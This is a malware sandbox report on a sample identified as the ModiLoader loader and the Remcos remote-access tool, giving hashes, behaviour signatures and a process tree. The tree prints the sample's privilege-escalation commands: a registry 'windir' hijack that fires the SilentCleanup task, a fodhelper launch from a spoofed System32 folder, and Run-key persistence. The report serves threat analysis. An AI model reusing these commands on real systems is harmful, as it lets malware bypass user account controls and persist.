Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    146s
  • max time network
    154s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    08/07/2020, 10:06

General

  • Target

    de2ebb27023e08b71d091c7695c59192.exe

  • Size

    649KB

  • MD5

    de2ebb27023e08b71d091c7695c59192

  • SHA1

    6b5d2d11a1b712b38d6d699612cdd66fcc755db8

  • SHA256

    e67dd040ce53fbf4e0ef2121dabd060c5c764ede3eec55801376b144a0f40419

  • SHA512

    39c16d7f3672c6ee3c848e898a56b678bc7127ed1af0984a726a4557d8cd73ee96cdea1aa97f79e92680acfed7f666fd35e9f456acf15a54308cbc0eedc99071

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Executes dropped EXE 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Modifies registry key 1 TTPs 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 537 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\de2ebb27023e08b71d091c7695c59192.exe
    "C:\Users\Admin\AppData\Local\Temp\de2ebb27023e08b71d091c7695c59192.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:1388
    • C:\Windows\SysWOW64\TapiUnattend.exe
      "C:\Windows\System32\TapiUnattend.exe"
      2⤵
        PID:1328
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c C:\Users\Public\Natso.bat
          3⤵
            PID:1816
            • C:\Windows\SysWOW64\reg.exe
              reg delete hkcu\Environment /v windir /f
              4⤵
              • Modifies registry key
              PID:1556
            • C:\Windows\SysWOW64\reg.exe
              reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "
              4⤵
              • Modifies registry key
              PID:1044
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
              4⤵
                PID:736
              • C:\Windows\SysWOW64\reg.exe
                reg delete hkcu\Environment /v windir /f
                4⤵
                • Modifies registry key
                PID:1452
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c C:\Users\Public\Runex.bat
              3⤵
                PID:1528
                • C:\Windows \System32\fodhelper.exe
                  "C:\Windows \System32\fodhelper.exe"
                  4⤵
                  • Executes dropped EXE
                  PID:1644
                • C:\Windows \System32\fodhelper.exe
                  "C:\Windows \System32\fodhelper.exe"
                  4⤵
                  • Executes dropped EXE
                  PID:1196
            • C:\Program Files (x86)\internet explorer\ieinstal.exe
              "C:\Program Files (x86)\internet explorer\ieinstal.exe"
              2⤵
              • Suspicious use of SetWindowsHookEx
              PID:1072

          Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • memory/1388-130-0x0000000010530000-0x0000000010554000-memory.dmp

            Filesize

            144KB

          • memory/1388-124-0x0000000010410000-0x0000000010450000-memory.dmp

            Filesize

            256KB